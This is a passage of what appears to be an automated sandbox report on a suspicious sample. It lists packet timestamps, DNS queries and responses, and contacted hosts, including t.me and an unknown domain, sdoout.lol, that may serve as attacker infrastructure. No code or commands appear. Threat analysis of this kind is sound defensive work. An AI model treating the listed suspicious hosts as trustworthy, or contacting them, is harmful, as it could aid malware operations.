                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.648022890 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.648878098 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.649189949 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.649354935 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.649405003 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.649480104 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.649749041 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.649816036 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.651068926 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.651611090 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.678258896 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.703850031 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.704376936 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.704546928 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.742527008 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.774734974 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.797663927 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:33.939434052 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.227022886 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.228065014 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.240139008 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.248207092 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.248352051 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.288212061 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.288479090 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.293788910 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.293935061 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.321535110 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.322206974 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.323153019 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.342510939 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.343147039 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.343908072 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.344000101 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.345482111 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.345541954 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.361998081 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.382678032 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.383330107 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.383544922 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.385140896 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.385376930 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.385421038 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.387676001 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.387981892 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.387993097 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.388004065 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.388932943 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.389156103 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.391093016 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.391415119 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.391513109 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.391733885 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.392441988 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.392575026 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.417803049 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.439256907 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.466129065 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.488711119 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.488734007 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.488743067 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.488750935 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.490168095 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.490252018 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.490825891 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.520073891 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.523952007 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.525278091 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.587490082 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.620884895 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.855470896 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.856430054 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.949394941 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.949888945 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.950289965 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.950809956 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:34.951000929 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.138359070 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.138998985 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.232306004 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.232609987 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.232902050 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.233239889 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.239650965 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.398555994 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.398663998 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.411226988 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.411576986 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.492878914 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.493817091 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.493941069 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.494344950 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.509645939 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.511378050 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.511682034 CET44362351162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.512048006 CET62351443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.817914009 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.818249941 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.820735931 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.820918083 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.821264982 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.821784019 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.912395000 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.913175106 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.913872004 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.914185047 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.914725065 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.915095091 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.915664911 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.916028976 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.916269064 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.917099953 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.924072981 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.924335957 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.944974899 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:35.945064068 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.012048960 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.018388987 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.019048929 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.019352913 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.019511938 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.038295984 CET44360337172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:36.039688110 CET60337443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.820004940 CET192.168.2.51.1.1.1c2ba(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:17.284779072 CET192.168.2.51.1.1.10x9525Standard query (0)EAXdwMrdIdPn.EAXdwMrdIdPnA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.276854038 CET192.168.2.51.1.1.10xf8feStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:03.662466049 CET192.168.2.51.1.1.10x8a1bStandard query (0)sdoout.lolA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.906526089 CET192.168.2.51.1.1.10x5852Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.906660080 CET192.168.2.51.1.1.10x277aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.173966885 CET192.168.2.51.1.1.10x8caeStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.174474001 CET192.168.2.51.1.1.10x84f6Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.175679922 CET192.168.2.51.1.1.10xca56Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.175848961 CET192.168.2.51.1.1.10x5eb2Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.523332119 CET192.168.2.51.1.1.10x8118Standard query (0)ntp.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.523530960 CET192.168.2.51.1.1.10x390fStandard query (0)ntp.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:28.991080999 CET192.168.2.51.1.1.10x8501Standard query (0)bzib.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:28.991333008 CET192.168.2.51.1.1.10x1b18Standard query (0)bzib.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.051295996 CET192.168.2.51.1.1.10xa543Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.051548958 CET192.168.2.51.1.1.10x33ccStandard query (0)sb.scorecardresearch.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.061224937 CET192.168.2.51.1.1.10x6259Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.061357021 CET192.168.2.51.1.1.10xc65dStandard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.074866056 CET192.168.2.51.1.1.10x27aStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.075306892 CET192.168.2.51.1.1.10x487fStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.077773094 CET192.168.2.51.1.1.10x138dStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.077927113 CET192.168.2.51.1.1.10x3aStandard query (0)api.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.275532961 CET192.168.2.51.1.1.10x7734Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.275773048 CET192.168.2.51.1.1.10x51eaStandard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.323586941 CET192.168.2.51.1.1.10xdf56Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.323745012 CET192.168.2.51.1.1.10x5e0eStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.324139118 CET192.168.2.51.1.1.10xfa7aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.324327946 CET192.168.2.51.1.1.10x2e7Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.346270084 CET192.168.2.51.1.1.10xced8Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.346440077 CET192.168.2.51.1.1.10x259cStandard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:45:17.300282001 CET1.1.1.1192.168.2.50x9525Name error (3)EAXdwMrdIdPn.EAXdwMrdIdPnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:02.283384085 CET1.1.1.1192.168.2.50xf8feNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:03.676537991 CET1.1.1.1192.168.2.50x8a1bNo error (0)sdoout.lol116.203.14.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.913381100 CET1.1.1.1192.168.2.50x5852No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:13.913391113 CET1.1.1.1192.168.2.50x277aNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.180780888 CET1.1.1.1192.168.2.50x8caeNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.180780888 CET1.1.1.1192.168.2.50x8caeNo error (0)plus.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:18.181685925 CET1.1.1.1192.168.2.50x84f6No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:19.182830095 CET1.1.1.1192.168.2.50xca56No error (0)play.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.530635118 CET1.1.1.1192.168.2.50x390fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.530740023 CET1.1.1.1192.168.2.50x8118No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.532654047 CET1.1.1.1192.168.2.50xe961No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.532829046 CET1.1.1.1192.168.2.50x3538No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:27.532829046 CET1.1.1.1192.168.2.50x3538No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:28.998792887 CET1.1.1.1192.168.2.50x1b18No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:28.999253988 CET1.1.1.1192.168.2.50x8501No error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.059083939 CET1.1.1.1192.168.2.50xa543No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.059083939 CET1.1.1.1192.168.2.50xa543No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.059083939 CET1.1.1.1192.168.2.50xa543No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.059083939 CET1.1.1.1192.168.2.50xa543No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.069255114 CET1.1.1.1192.168.2.50x6259No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.069442034 CET1.1.1.1192.168.2.50xc65dNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.081834078 CET1.1.1.1192.168.2.50x27aNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.082190990 CET1.1.1.1192.168.2.50x487fNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.084397078 CET1.1.1.1192.168.2.50x3aNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:30.084629059 CET1.1.1.1192.168.2.50x138dNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.282769918 CET1.1.1.1192.168.2.50x7734No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.282769918 CET1.1.1.1192.168.2.50x7734No error (0)googlehosted.l.googleusercontent.com172.217.16.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:31.282841921 CET1.1.1.1192.168.2.50x51eaNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331337929 CET1.1.1.1192.168.2.50xdf56No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331337929 CET1.1.1.1192.168.2.50xdf56No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331648111 CET1.1.1.1192.168.2.50x5e0eNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331834078 CET1.1.1.1192.168.2.50xfa7aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.331834078 CET1.1.1.1192.168.2.50xfa7aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.332169056 CET1.1.1.1192.168.2.50x2e7No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.354885101 CET1.1.1.1192.168.2.50xced8No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.354885101 CET1.1.1.1192.168.2.50xced8No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.354902983 CET1.1.1.1192.168.2.50x259cNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.795361996 CET1.1.1.1192.168.2.50xe570No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    Dec 31, 2024 09:46:32.795361996 CET1.1.1.1192.168.2.50xe570No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                                                                                                                                    • sdoout.lol
                                                                                                                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                                                                                                                    • apis.google.com
                                                                                                                                                                                                                                                                                                                                    • play.google.com
                                                                                                                                                                                                                                                                                                                                    • clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                                                                    • chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                                    • https:
                                                                                                                                                                                                                                                                                                                                      • c.msn.com
                                                                                                                                                                                                                                                                                                                                      • sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                                                      • browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
